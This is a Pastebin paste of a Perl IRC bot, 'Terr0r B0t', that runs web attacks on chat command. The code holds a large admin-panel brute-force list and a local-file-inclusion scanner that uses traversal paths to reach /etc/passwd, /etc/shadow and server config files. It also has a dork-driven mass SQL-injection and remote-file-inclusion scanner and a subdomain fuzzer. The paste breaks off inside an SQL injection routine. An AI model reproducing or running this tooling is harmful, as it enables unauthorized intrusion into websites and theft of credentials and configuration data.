Guest User

Untitled

a guest
Jan 19th, 2012
482
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 34.36 KB | None | 0 0
  1. #!usr/bin/perl
  2. #Terr0r B0t 0.3 (C) Doddy Hackman 2012
  3. #Commands to use
  4. #
  5. #!base64 <encode/decode> <string>
  6. #!hex <encode/decode> <string>
  7. #!ascii <encode/decode> <string>
  8. #!panel <page>
  9. #!sqli <page>
  10. #!lfi <page>
  11. #!iplocator <ip>
  12. #!sqlifinder <page>
  13. #!rfifinder <page>
  14. #!help
  15.  
  16. use IO::Socket;
  17. use LWP::UserAgent;
  18. use HTTP::Request::Common;
  19. use HTML::LinkExtor;
  20.  
  21. my @dns = (
  22. 'www', 'www1', 'www2', 'www3',
  23. 'ftp', 'ns', 'mail', '3com',
  24. 'aix', 'apache', 'back', 'bind',
  25. 'boreder', 'bsd', 'business', 'chains',
  26. 'cisco', 'content', 'corporate', 'cpv',
  27. 'dns', 'domino', 'dominoserver', 'download',
  28. 'e-mail', 'e-safe', 'email', 'esafe',
  29. 'external', 'extranet', 'firebox', 'firewall',
  30. 'front', 'fw', 'fw0', 'fwe',
  31. 'fw-1', 'firew', 'gate', 'gatekeeper',
  32. 'gateway', 'gauntlet', 'group', 'help',
  33. 'hop', 'hp', 'hpjet', 'hpux',
  34. 'http', 'https', 'hub', 'ibm',
  35. 'ids', 'info', 'inside', 'internal',
  36. 'internet', 'intranet', 'ipfw', 'irix',
  37. 'jet', 'list', 'lotus', 'lotusdomino',
  38. 'lotusnotes', 'lotusserver', 'mailfeed', 'mailgate',
  39. 'mailgateway', 'mailgroup', 'mailhost', 'maillist',
  40. 'mailpop', 'mailrelay', 'mimesweeper', 'ms',
  41. 'msproxy', 'mx', 'nameserver', 'news',
  42. 'newsdesk', 'newsfeed', 'newsgroup', 'newsroom',
  43. 'newsserver', 'nntp', 'notes', 'noteserver',
  44. 'notesserver', 'nt', 'outside', 'pix',
  45. 'pop', 'pop3', 'pophost', 'popmail',
  46. 'popserver', 'print', 'printer', 'private',
  47. 'proxy', 'proxyserver', 'public', 'qpop',
  48. 'raptor', 'read', 'redcreek', 'redhat',
  49. 'route', 'router', 'scanner', 'screen',
  50. 'screening', 's#ecure', 'seek', 'smail',
  51. 'smap', 'smtp', 'smtpgateway', 'smtpgw',
  52. 'solaris', 'sonic', 'spool', 'squid',
  53. 'sun', 'sunos', 'suse', 'switch',
  54. 'transfer', 'trend', 'trendmicro', 'vlan',
  55. 'vpn', 'wall', 'web', 'webmail',
  56. 'webserver', 'webswitch', 'win2000', 'win2k',
  57. 'upload', 'file', 'fileserver', 'storage',
  58. 'backup', 'share', 'core', 'gw',
  59. 'wingate', 'main', 'noc', 'home',
  60. 'radius', 'security', 'access', 'dmz',
  61. 'domain', 'sql', 'mysql', 'mssql',
  62. 'postgres', 'db', 'database', 'imail',
  63. 'imap', 'exchange', 'sendmail', 'louts',
  64. 'test', 'logs', 'stage', 'staging',
  65. 'dev', 'devel', 'ppp', 'chat',
  66. 'irc', 'eng', 'admin', 'unix',
  67. 'linux', 'windows', 'apple', 'hp-ux',
  68. 'bigip', 'pc'
  69. );
  70.  
  71. my @panels = (
  72. 'admin/admin.asp', 'admin/login.asp',
  73. 'admin/index.asp', 'admin/admin.aspx',
  74. 'admin/login.aspx', 'admin/index.aspx',
  75. 'admin/webmaster.asp', 'admin/webmaster.aspx',
  76. 'asp/admin/index.asp', 'asp/admin/index.aspx',
  77. 'asp/admin/admin.asp', 'asp/admin/admin.aspx',
  78. 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx',
  79. 'admin/', 'login.asp',
  80. 'login.aspx', 'admin.asp',
  81. 'admin.aspx', 'webmaster.aspx',
  82. 'webmaster.asp', 'login/index.asp',
  83. 'login/index.aspx', 'login/login.asp',
  84. 'login/login.aspx', 'login/admin.asp',
  85. 'login/admin.aspx', 'administracion/index.asp',
  86. 'administracion/index.aspx', 'administracion/login.asp',
  87. 'administracion/login.aspx', 'administracion/webmaster.asp',
  88. 'administracion/webmaster.aspx', 'administracion/admin.asp',
  89. 'administracion/admin.aspx', 'php/admin/',
  90. 'admin/admin.php', 'admin/index.php',
  91. 'admin/login.php', 'admin/system.php',
  92. 'admin/ingresar.php', 'admin/administrador.php',
  93. 'admin/default.php', 'administracion/',
  94. 'administracion/index.php', 'administracion/login.php',
  95. 'administracion/ingresar.php', 'administracion/admin.php',
  96. 'administration/', 'administration/index.php',
  97. 'administration/login.php', 'administrator/index.php',
  98. 'administrator/login.php', 'administrator/system.php',
  99. 'system/', 'system/login.php',
  100. 'admin.php', 'login.php',
  101. 'administrador.php', 'administration.php',
  102. 'administrator.php', 'admin1.html',
  103. 'admin1.php', 'admin2.php',
  104. 'admin2.html', 'yonetim.php',
  105. 'yonetim.html', 'yonetici.php',
  106. 'yonetici.html', 'adm/',
  107. 'admin/account.php', 'admin/account.html',
  108. 'admin/index.html', 'admin/login.html',
  109. 'admin/home.php', 'admin/controlpanel.html',
  110. 'admin/controlpanel.php', 'admin.html',
  111. 'admin/cp.php', 'admin/cp.html',
  112. 'cp.php', 'cp.html',
  113. 'administrator/', 'administrator/index.html',
  114. 'administrator/login.html', 'administrator/account.html',
  115. 'administrator/account.php', 'administrator.html',
  116. 'login.html', 'modelsearch/login.php',
  117. 'moderator.php', 'moderator.html',
  118. 'moderator/login.php', 'moderator/login.html',
  119. 'moderator/admin.php', 'moderator/admin.html',
  120. 'moderator/', 'account.php',
  121. 'account.html', 'controlpanel/',
  122. 'controlpanel.php', 'controlpanel.html',
  123. 'admincontrol.php', 'admincontrol.html',
  124. 'adminpanel.php', 'adminpanel.html',
  125. 'admin1.asp', 'admin2.asp',
  126. 'yonetim.asp', 'yonetici.asp',
  127. 'admin/account.asp', 'admin/home.asp',
  128. 'admin/controlpanel.asp', 'admin/cp.asp',
  129. 'cp.asp', 'administrator/index.asp',
  130. 'administrator/login.asp', 'administrator/account.asp',
  131. 'administrator.asp', 'modelsearch/login.asp',
  132. 'moderator.asp', 'moderator/login.asp',
  133. 'moderator/admin.asp', 'account.asp',
  134. 'controlpanel.asp', 'admincontrol.asp',
  135. 'adminpanel.asp', 'fileadmin/',
  136. 'fileadmin.php', 'fileadmin.asp',
  137. 'fileadmin.html', 'administration.html',
  138. 'sysadmin.php', 'sysadmin.html',
  139. 'phpmyadmin/', 'myadmin/',
  140. 'sysadmin.asp', 'sysadmin/',
  141. 'ur-admin.asp', 'ur-admin.php',
  142. 'ur-admin.html', 'ur-admin/',
  143. 'Server.php', 'Server.html',
  144. 'Server.asp', 'Server/',
  145. 'wp-admin/', 'administr8.php',
  146. 'administr8.html', 'administr8/',
  147. 'administr8.asp', 'webadmin/',
  148. 'webadmin.php', 'webadmin.asp',
  149. 'webadmin.html', 'administratie/',
  150. 'admins/', 'admins.php',
  151. 'admins.asp', 'admins.html',
  152. 'administrivia/', 'Database_Administration/',
  153. 'WebAdmin/', 'useradmin/',
  154. 'sysadmins/', 'admin1/',
  155. 'system-administration/', 'administrators/',
  156. 'pgadmin/', 'directadmin/',
  157. 'staradmin/', 'ServerAdministrator/',
  158. 'SysAdmin/', 'administer/',
  159. 'LiveUser_Admin/', 'sys-admin/',
  160. 'typo3/', 'panel/',
  161. 'cpanel/', 'cPanel/',
  162. 'cpanel_file/', 'platz_login/',
  163. 'rcLogin/', 'blogindex/',
  164. 'formslogin/', 'autologin/',
  165. 'support_login/', 'meta_login/',
  166. 'manuallogin/', 'simpleLogin/',
  167. 'loginflat/', 'utility_login/',
  168. 'showlogin/', 'memlogin/',
  169. 'members/', 'login-redirect/',
  170. 'sub-login/', 'wp-login/',
  171. 'login1/', 'dir-login/',
  172. 'login_db/', 'xlogin/',
  173. 'smblogin/', 'customer_login/',
  174. 'UserLogin/', 'login-us/',
  175. 'acct_login/', 'admin_area/',
  176. 'bigadmin/', 'project-admins/',
  177. 'phppgadmin/', 'pureadmin/',
  178. 'sql-admin/', 'radmind/',
  179. 'openvpnadmin/', 'wizmysqladmin/',
  180. 'vadmind/', 'ezsqliteadmin/',
  181. 'hpwebjetadmin/', 'newsadmin/',
  182. 'adminpro/', 'Lotus_Domino_Admin/',
  183. 'bbadmin/', 'vmailadmin/',
  184. 'Indy_admin/', 'ccp14admin/',
  185. 'irc-macadmin/', 'banneradmin/',
  186. 'sshadmin/', 'phpldapadmin/',
  187. 'macadmin/', 'administratoraccounts/',
  188. 'admin4_account/', 'admin4_colon/',
  189. 'radmind-1/', 'Super-Admin/',
  190. 'AdminTools/', 'cmsadmin/',
  191. 'SysAdmin2/', 'globes_admin/',
  192. 'cadmins/', 'phpSQLiteAdmin/',
  193. 'navSiteAdmin/', 'server_admin_small/',
  194. 'logo_sysadmin/', 'server/',
  195. 'database_administration/', 'power_user/',
  196. 'system_administration/', 'ss_vms_admin_sm/'
  197. );
  198.  
  199. my @buscar3 = (
  200. '../../../boot.ini',
  201. '../../../../boot.ini',
  202. '../../../../../boot.ini',
  203. '../../../../../../boot.ini',
  204. '/etc/passwd',
  205. '/etc/shadow',
  206. '/etc/shadow~',
  207. '/etc/hosts',
  208. '/etc/motd',
  209. '/etc/apache/apache.conf',
  210. '/etc/fstab',
  211. '/etc/apache2/apache2.conf',
  212. '/etc/apache/httpd.conf',
  213. '/etc/httpd/conf/httpd.conf',
  214. '/etc/apache2/httpd.conf',
  215. '/etc/apache2/sites-available/default',
  216. '/etc/mysql/my.cnf',
  217. '/etc/my.cnf',
  218. '/etc/sysconfig/network-scripts/ifcfg-eth0',
  219. '/etc/redhat-release',
  220. '/etc/httpd/conf.d/php.conf',
  221. '/etc/pam.d/proftpd',
  222. '/etc/phpmyadmin/config.inc.php',
  223. '/var/www/config.php',
  224. '/etc/httpd/logs/error_log',
  225. '/etc/httpd/logs/error.log',
  226. '/etc/httpd/logs/access_log',
  227. '/etc/httpd/logs/access.log',
  228. '/var/log/apache/error_log',
  229. '/var/log/apache/error.log',
  230. '/var/log/apache/access_log',
  231. '/var/log/apache/access.log',
  232. '/var/log/apache2/error_log',
  233. '/var/log/apache2/error.log',
  234. '/var/log/apache2/access_log',
  235. '/var/log/apache2/access.log',
  236. '/var/www/logs/error_log',
  237. '/var/www/logs/error.log',
  238. '/var/www/logs/access_log',
  239. '/var/www/logs/access.log',
  240. '/usr/local/apache/logs/error_log',
  241. '/usr/local/apache/logs/error.log',
  242. '/usr/local/apache/logs/access_log',
  243. '/usr/local/apache/logs/access.log',
  244. '/var/log/error_log',
  245. '/var/log/error.log',
  246. '/var/log/access_log',
  247. '/var/log/access.log',
  248. '/etc/group',
  249. '/etc/security/group',
  250. '/etc/security/passwd',
  251. '/etc/security/user',
  252. '/etc/security/environ',
  253. '/etc/security/limits',
  254. '/usr/lib/security/mkuser.default',
  255. '/apache/logs/access.log',
  256. '/apache/logs/error.log',
  257. '/etc/httpd/logs/acces_log',
  258. '/etc/httpd/logs/acces.log',
  259. '/var/log/httpd/access_log',
  260. '/var/log/httpd/error_log',
  261. '/apache2/logs/error.log',
  262. '/apache2/logs/access.log',
  263. '/logs/error.log',
  264. '/logs/access.log',
  265. '/usr/local/apache2/logs/access_log',
  266. '/usr/local/apache2/logs/access.log',
  267. '/usr/local/apache2/logs/error_log',
  268. '/usr/local/apache2/logs/error.log',
  269. '/var/log/httpd/access.log',
  270. '/var/log/httpd/error.log',
  271. '/opt/lampp/logs/access_log',
  272. '/opt/lampp/logs/error_log',
  273. '/opt/xampp/logs/access_log',
  274. '/opt/xampp/logs/error_log',
  275. '/opt/lampp/logs/access.log',
  276. '/opt/lampp/logs/error.log',
  277. '/opt/xampp/logs/access.log',
  278. '/opt/xampp/logs/error.log',
  279. 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
  280. 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
  281. '/usr/local/apache/conf/httpd.conf',
  282. '/usr/local/apache2/conf/httpd.conf',
  283. '/etc/apache/conf/httpd.conf',
  284. '/usr/local/etc/apache/conf/httpd.conf',
  285. '/usr/local/apache/httpd.conf',
  286. '/usr/local/apache2/httpd.conf',
  287. '/usr/local/httpd/conf/httpd.conf',
  288. '/usr/local/etc/apache2/conf/httpd.conf',
  289. '/usr/local/etc/httpd/conf/httpd.conf',
  290. '/usr/apache2/conf/httpd.conf',
  291. '/usr/apache/conf/httpd.conf',
  292. '/usr/local/apps/apache2/conf/httpd.conf',
  293. '/usr/local/apps/apache/conf/httpd.conf',
  294. '/etc/apache2/conf/httpd.conf',
  295. '/etc/http/conf/httpd.conf',
  296. '/etc/httpd/httpd.conf',
  297. '/etc/http/httpd.conf',
  298. '/etc/httpd.conf',
  299. '/opt/apache/conf/httpd.conf',
  300. '/opt/apache2/conf/httpd.conf',
  301. '/var/www/conf/httpd.conf',
  302. '/private/etc/httpd/httpd.conf',
  303. '/private/etc/httpd/httpd.conf.default',
  304. '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
  305. '/Volumes/webBackup/private/etc/httpd/httpd.conf',
  306. '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
  307. 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
  308. 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
  309. 'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
  310. '/usr/local/php/httpd.conf.php',
  311. '/usr/local/php4/httpd.conf.php',
  312. '/usr/local/php5/httpd.conf.php',
  313. '/usr/local/php/httpd.conf',
  314. '/usr/local/php4/httpd.conf',
  315. '/usr/local/php5/httpd.conf',
  316. '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
  317. '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
  318. '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
  319. '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
  320. '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
  321. '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
  322. '/usr/local/etc/apache/vhosts.conf',
  323. '/etc/php.ini',
  324. '/bin/php.ini',
  325. '/etc/httpd/php.ini',
  326. '/usr/lib/php.ini',
  327. '/usr/lib/php/php.ini',
  328. '/usr/local/etc/php.ini',
  329. '/usr/local/lib/php.ini',
  330. '/usr/local/php/lib/php.ini',
  331. '/usr/local/php4/lib/php.ini',
  332. '/usr/local/php5/lib/php.ini',
  333. '/usr/local/apache/conf/php.ini',
  334. '/etc/php4.4/fcgi/php.ini',
  335. '/etc/php4/apache/php.ini',
  336. '/etc/php4/apache2/php.ini',
  337. '/etc/php5/apache/php.ini',
  338. '/etc/php5/apache2/php.ini',
  339. '/etc/php/php.ini',
  340. '/etc/php/php4/php.ini',
  341. '/etc/php/apache/php.ini',
  342. '/etc/php/apache2/php.ini',
  343. '/web/conf/php.ini',
  344. '/usr/local/Zend/etc/php.ini',
  345. '/opt/xampp/etc/php.ini',
  346. '/var/local/www/conf/php.ini',
  347. '/etc/php/cgi/php.ini',
  348. '/etc/php4/cgi/php.ini',
  349. '/etc/php5/cgi/php.ini',
  350. 'c:\php5\php.ini',
  351. 'c:\php4\php.ini',
  352. 'c:\php\php.ini',
  353. 'c:\PHP\php.ini',
  354. 'c:\WINDOWS\php.ini',
  355. 'c:\WINNT\php.ini',
  356. 'c:\apache\php\php.ini',
  357. 'c:\xampp\apache\bin\php.ini',
  358. 'c:\NetServer\bin\stable\apache\php.ini',
  359. 'c:\home2\bin\stable\apache\php.ini',
  360. 'c:\home\bin\stable\apache\php.ini',
  361. '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
  362. '/usr/local/cpanel/logs',
  363. '/usr/local/cpanel/logs/stats_log',
  364. '/usr/local/cpanel/logs/access_log',
  365. '/usr/local/cpanel/logs/error_log',
  366. '/usr/local/cpanel/logs/license_log',
  367. '/usr/local/cpanel/logs/login_log',
  368. '/var/cpanel/cpanel.config',
  369. '/var/log/mysql/mysql-bin.log',
  370. '/var/log/mysql.log',
  371. '/var/log/mysqlderror.log',
  372. '/var/log/mysql/mysql.log',
  373. '/var/log/mysql/mysql-slow.log',
  374. '/var/mysql.log',
  375. '/var/lib/mysql/my.cnf',
  376. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
  377. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
  378. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
  379. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
  380. 'C:\ProgramFiles\MySQL\data\hostname.err',
  381. 'C:\ProgramFiles\MySQL\data\mysql.log',
  382. 'C:\ProgramFiles\MySQL\data\mysql.err',
  383. 'C:\ProgramFiles\MySQL\data\mysql-bin.log',
  384. 'C:\MySQL\data\hostname.err',
  385. 'C:\MySQL\data\mysql.log',
  386. 'C:\MySQL\data\mysql.err',
  387. 'C:\MySQL\data\mysql-bin.log',
  388. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
  389. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
  390. 'C:\ProgramFiles\MySQL\my.ini',
  391. 'C:\ProgramFiles\MySQL\my.cnf',
  392. 'C:\MySQL\my.ini',
  393. 'C:\MySQL\my.cnf',
  394. '/etc/logrotate.d/proftpd',
  395. '/www/logs/proftpd.system.log',
  396. '/var/log/proftpd',
  397. '/etc/proftp.conf',
  398. '/etc/protpd/proftpd.conf',
  399. '/etc/vhcs2/proftpd/proftpd.conf',
  400. '/etc/proftpd/modules.conf',
  401. '/var/log/vsftpd.log',
  402. '/etc/vsftpd.chroot_list',
  403. '/etc/logrotate.d/vsftpd.log',
  404. '/etc/vsftpd/vsftpd.conf',
  405. '/etc/vsftpd.conf',
  406. '/etc/chrootUsers',
  407. '/var/log/xferlog',
  408. '/var/adm/log/xferlog',
  409. '/etc/wu-ftpd/ftpaccess',
  410. '/etc/wu-ftpd/ftphosts',
  411. '/etc/wu-ftpd/ftpusers',
  412. '/usr/sbin/pure-config.pl',
  413. '/usr/etc/pure-ftpd.conf',
  414. '/etc/pure-ftpd/pure-ftpd.conf',
  415. '/usr/local/etc/pure-ftpd.conf',
  416. '/usr/local/etc/pureftpd.pdb',
  417. '/usr/local/pureftpd/etc/pureftpd.pdb',
  418. '/usr/local/pureftpd/sbin/pure-config.pl',
  419. '/usr/local/pureftpd/etc/pure-ftpd.conf',
  420. '/etc/pure-ftpd/pure-ftpd.pdb',
  421. '/etc/pureftpd.pdb',
  422. '/etc/pureftpd.passwd',
  423. '/etc/pure-ftpd/pureftpd.pdb',
  424. '/var/log/pure-ftpd/pure-ftpd.log',
  425. '/logs/pure-ftpd.log',
  426. '/var/log/pureftpd.log',
  427. '/var/log/ftp-proxy/ftp-proxy.log',
  428. '/var/log/ftp-proxy',
  429. '/var/log/ftplog',
  430. '/etc/logrotate.d/ftp',
  431. '/etc/ftpchroot',
  432. '/etc/ftphosts',
  433. '/var/log/exim_mainlog',
  434. '/var/log/exim/mainlog',
  435. '/var/log/maillog',
  436. '/var/log/exim_paniclog',
  437. '/var/log/exim/paniclog',
  438. '/var/log/exim/rejectlog',
  439. '/var/log/exim_rejectlog'
  440. );
  441.  
  442. my $nave = LWP::UserAgent->new();
  443. $nave->timeout(13);
  444. $nave->agent(
  445. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  446. );
  447.  
  448. print "\n[+] Terr0r B0t 0.3 (c) Doddy Hackman 2012\n\n";
  449.  
  450. my $servidor = "127.0.0.1"; #Server
  451. my $canal = "#locos"; #Channel
  452. my $nick = "Hussein"; # Nick
  453. my $port = "6667"; # Port
  454.  
  455. print "[+] Starting the bot\n";
  456.  
  457. my $soquete = new IO::Socket::INET(
  458. PeerAddr => $servidor,
  459. PeerPort => $port,
  460. Proto => 'tcp'
  461. );
  462.  
  463. if ( !$soquete ) {
  464. print "\n[-] Error\n";
  465. exit 1;
  466. }
  467.  
  468. print $soquete "NICK $nick\r\n";
  469. print $soquete "USER $nick 1 1 1 1\r\n";
  470. print $soquete "JOIN $canal\r\n";
  471.  
  472. print "[+] Online\n\n";
  473.  
  474. while ( my $log = <$soquete> ) {
  475. chomp($log);
  476.  
  477. if ( $log =~ /^PING(.*)$/i ) {
  478. print $soquete "PONG $1\r\n";
  479. }
  480.  
  481. if ( $log =~ m/:!help/g ) {
  482. print $soquete "PRIVMSG $canal : [++] Commands\r\n";
  483. print $soquete "PRIVMSG $canal : [+] !help\r\n";
  484. print $soquete "PRIVMSG $canal : [+] !locatorip <ip>\r\n";
  485. print $soquete "PRIVMSG $canal : [+] !sqlifinder <dork>\r\n";
  486. print $soquete "PRIVMSG $canal : [+] !rfifinder <dork>\r\n";
  487. print $soquete "PRIVMSG $canal : [+] !panel <page>\r\n";
  488. print $soquete "PRIVMSG $canal : [+] !sqli <page>\r\n";
  489. print $soquete "PRIVMSG $canal : [+] !fuzzdns <page>\r\n";
  490. print $soquete "PRIVMSG $canal : [+] !lfi <page>\r\n";
  491. print $soquete
  492. "PRIVMSG $canal : [+] !base64 <encode/decode> <text>\r\n";
  493. print $soquete "PRIVMSG $canal : [+] !ascii <encode/decode> <text>\r\n";
  494. print $soquete "PRIVMSG $canal : [+] !hex <encode/decode> <text> \r\n";
  495. }
  496.  
  497. if ( $log =~ m/:!panel (.*)$/g ) {
  498. scan($1);
  499. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  500. }
  501.  
  502. if ( $log =~ m/:!iplocator (.*)$/g ) {
  503. my $ip = $1;
  504. print $soquete "PRIVMSG $canal : [+] Getting info\r\n";
  505. $total =
  506. "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$ip";
  507. $re = toma($total);
  508.  
  509. if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  510. print $soquete "PRIVMSG $canal : [+] City : $2\r\n";
  511. }
  512. else {
  513. print $soquete "PRIVMSG $canal : [-] Not Found\r\n";
  514. }
  515. if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  516. print $soquete "PRIVMSG $canal : [+] Country : $2\r\n";
  517. }
  518. if ( $re =~ /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  519. print $soquete "PRIVMSG $canal : [+] State or Region : $2\r\n";
  520. }
  521. }
  522.  
  523. if ( $log =~ m/:!sqlifinder (.*)$/g ) {
  524. my $dork = $1;
  525. my @paginas = &google( $dork, "30" ); # 30 EDIT
  526. print $soquete "PRIVMSG $canal : [+] SQL Scan Started\r\n";
  527. print $soquete "PRIVMSG $canal : [+] Searching pages\r\n";
  528. print $soquete "PRIVMSG $canal : [Webs Count] : "
  529. . int(@paginas) . "\r\n";
  530. print $soquete "PRIVMSG $canal : [Status] : Scanning\r\n";
  531.  
  532. for my $page (@paginas) {
  533. my ( $pass1, $pass2 ) = ( "+", "--" );
  534. $code1 =
  535. toma( $page . "-1"
  536. . $pass1 . "union"
  537. . $pass1
  538. . "select"
  539. . $pass1 . "666"
  540. . $pass2 );
  541. if ( $code1 =~
  542. /The used SELECT statements have a different number of columns/ig
  543. )
  544. {
  545. print $soquete "PRIVMSG $canal : [+] SQLI : $page\r\n";
  546. }
  547. }
  548. print $soquete "PRIVMSG $canal : [+] Finished\r\n";
  549. }
  550.  
  551. if ( $log =~ m/:!rfifinder (.*)$/g ) {
  552. my $dork = $1;
  553. my @paginas = &google( $dork, "30" ); # 30 EDIT
  554. print $soquete "PRIVMSG $canal : [+] RFI Scan Started\r\n";
  555. print $soquete "PRIVMSG $canal : [+] Searching pages\r\n";
  556. print $soquete "PRIVMSG $canal : [Webs Count] : "
  557. . int(@paginas) . "\r\n";
  558. print $soquete "PRIVMSG $canal : [Status] : Scanning\r\n";
  559.  
  560. for my $page (@paginas) {
  561. $code1 = toma( $page . "http:/www.supertangas.com/" );
  562. if ( $code1 =~ /Los mejores TANGAS de la red/ig )
  563. { #Esto es conocimiento de verdad xDDD
  564. print $soquete "PRIVMSG $canal : [+] RFI : $page\r\n";
  565. }
  566. }
  567. print $soquete "PRIVMSG $canal : [+] Finished\r\n";
  568. }
  569.  
  570. if ( $log =~ m/:!sqli (.*)$/g ) {
  571. print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
  572. scan2($1);
  573. }
  574.  
  575. if ( $log =~ m/:!fuzzdns (.*)$/g ) {
  576. scan1($1);
  577. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  578. }
  579.  
  580. if ( $log =~ m/:!lfi (.*)$/g ) {
  581. lfi($1);
  582. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  583. }
  584.  
  585. if ( $log =~ m/:!base64 (.*) (.*)$/g ) {
  586. use MIME::Base64;
  587. my ( $opcion, $aa ) = ( $1, $2 );
  588. if ( $opcion eq "encode" ) {
  589. print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
  590. print $soquete "PRIVMSG $canal : [+] Encode : "
  591. . encode_base64($aa) . "\r\n";
  592. }
  593. elsif ( $opcion eq "decode" ) {
  594. print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
  595. print $soquete "PRIVMSG $canal : [+] Text : "
  596. . decode_base64($aa) . "\r\n";
  597. }
  598. else {
  599. print $soquete "PRIVMSG $canal : ??\r\n";
  600. }
  601. }
  602.  
  603. if ( $log =~ m/:!ascii (.*) (.*)$/ ) {
  604. my ( $opcion, $aa ) = ( $1, $2 );
  605. chomp $aa;
  606. if ( $opcion eq "encode" ) {
  607. print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
  608. print $soquete "PRIVMSG $canal : [+] Encode : "
  609. . ascii($aa) . "\r\n";
  610. }
  611. elsif ( $opcion eq "decode" ) {
  612. print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
  613. print $soquete "PRIVMSG $canal : [+] Text : "
  614. . ascii_de($aa) . "\r\n";
  615. }
  616. else {
  617. print $soquete "PRIVMSG $canal : ???\r\n";
  618. }
  619. }
  620.  
  621. if ( $log =~ m/:!hex (.*) (.*)$/ ) {
  622. my ( $opcion, $aa ) = ( $1, $2 );
  623. chomp $aa;
  624. if ( $opcion eq "encode" ) {
  625. print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
  626. print $soquete "PRIVMSG $canal : [+] Encode : "
  627. . encode($aa) . "\r\n";
  628. }
  629. elsif ( $opcion eq "decode" ) {
  630. print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
  631. print $soquete "PRIVMSG $canal : [+] Text : "
  632. . decode($aa) . "\r\n";
  633. }
  634. else {
  635. print $soquete "PRIVMSG $canal : ????\r\n";
  636. }
  637. }
  638. }
  639.  
  640. sub lfi {
  641. print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]" . "\r\n";
  642. print $soquete "PRIVMSG $canal : [+] Status : [scanning]" . "\r\n";
  643. $code = toma( $_[0] );
  644. if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ig ) {
  645. print $soquete "PRIVMSG $canal : [+] Vulnerable !" . "\r\n";
  646. print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"
  647. . "\r\n";
  648. print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]" . "\r\n";
  649. for my $file (@buscar3) {
  650. $code1 = toma( $_[0] . $file );
  651. unless ( $code1 =~
  652. /No such file or directory in <b>(.*)<\/b> on line/ig )
  653. {
  654. $ok = 1;
  655. print $soquete "PRIVMSG $canal : [File Found] : "
  656. . $_[0]
  657. . $file . "\r\n";
  658. }
  659. }
  660. unless ( $ok == 1 ) {
  661. print $soquete "PRIVMSG $canal : [-] Dont found any file" . "\r\n";
  662. }
  663. }
  664. else {
  665. print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"
  666. . "\r\n";
  667. }
  668. }
  669.  
  670. sub scan1 {
  671. print $soquete "PRIVMSG $canal : [*] Searching DNS to " . $_[0] . "\r\n";
  672. for my $path (@dns) {
  673. $code = tomax( "http://" . $path . "." . $_[0] );
  674. if ( $code->is_success ) {
  675. print $soquete "PRIVMSG $canal : http://"
  676. . $path . "."
  677. . $_[0] . "\r\n";
  678. }
  679. }
  680. }
  681.  
  682. sub scan {
  683. print $soquete "PRIVMSG $canal [*] Searching panels to " . $_[0] . "\r\n";
  684. for my $path (@panels) {
  685. $code = tomax( $_[0] . "/" . $path );
  686. if ( $code->is_success ) {
  687. print "\a";
  688. $ct = 1;
  689. print $soquete "PRIVMSG $canal [Link] : "
  690. . $_[0] . "/"
  691. . $path . "\r\n";
  692. }
  693. }
  694. if ( $ct ne 1 ) {
  695. print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
  696. }
  697. }
  698.  
  699. sub scan2 {
  700.  
  701. my $rows = "0";
  702. my $asc;
  703. my $page = $_[0];
  704.  
  705. ( $pass1, $pass2 ) = &bypass( $ARGV[1] );
  706. $inyection =
  707. $page . "-1" . $pass1 . "order" . $pass1 . "by" . "9999999999" . $pass2;
  708. $code = toma($inyection);
  709. if ( $code =~
  710. /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
  711. || $code =~ /mysql_free_result/ig
  712. || $code =~ /mysql_fetch_assoc/ig
  713. || $code =~ /mysql_num_rows/ig
  714. || $code =~ /mysql_fetch_array/ig
  715. || $code =~ /mysql_fetch_assoc/ig
  716. || $code =~ /mysql_query/ig
  717. || $code =~ /mysql_free_result/ig
  718. || $code =~ /equivocado en su sintax/ig
  719. || $code =~ /You have an error in your SQL syntax/ig
  720. || $code =~ /Call to undefined function/ig )
  721. {
  722. $code1 =
  723. toma( $page . "-1"
  724. . $pass1 . "union"
